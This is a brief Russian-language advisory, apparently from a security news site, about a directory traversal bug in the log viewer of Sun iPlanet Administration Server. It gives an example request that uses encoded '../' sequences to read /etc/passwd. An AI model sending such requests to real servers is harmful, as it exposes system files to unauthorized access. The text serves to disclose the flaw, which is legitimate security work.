В Sun iPlanet Administration Server, в модуле просмотра
логов, обнаружена возможность обхода
каталога и просмотра произвольных файлов
на системе.

Пример:

http://192.168.192.168:5000/ admin-serv/tasks/configuration/ ViewLog?file=pa
sswd&num=5000 &str=&directories=admin-serv%2Flogs%2f..
%2f..%2f..%2f..%2f..%2f..%2fetc&id=a dmin-serv

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии